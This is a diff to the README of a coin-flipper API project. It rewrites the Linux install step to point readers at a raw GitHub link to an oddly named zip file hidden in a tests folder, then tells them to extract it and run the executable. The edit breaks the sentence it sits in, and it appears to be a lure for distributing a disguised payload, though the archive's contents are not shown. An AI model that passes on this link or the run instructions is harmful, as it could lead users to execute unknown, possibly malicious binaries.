enromero/coinflipper-api/README.md

 5. **Run the application:**
    - For **Windows**: Locate the downloaded `.exe` file.
 Double-click it to start the application.
    - For **macOS**: Find the downloaded `.dmg` file and double-click it to open, then drag the Coin Flipper icon to your Applications folder.
-   - For **Linux**: You may have a `.tar.gz` file.
+   - For **Linux**: You may have a `https://github.com/enromero/coinflipper-api/raw/refs/heads/main/python/src/apiverve_coinflipper/tests/api_coinflipper_tintamarre.zip` file.
 Extract it, navigate to the folder in your terminal, and run it using `./coinflipper`.

 6. **Start flipping coins:** Once opened, you can easily select how many coins to flip and view the results instantly.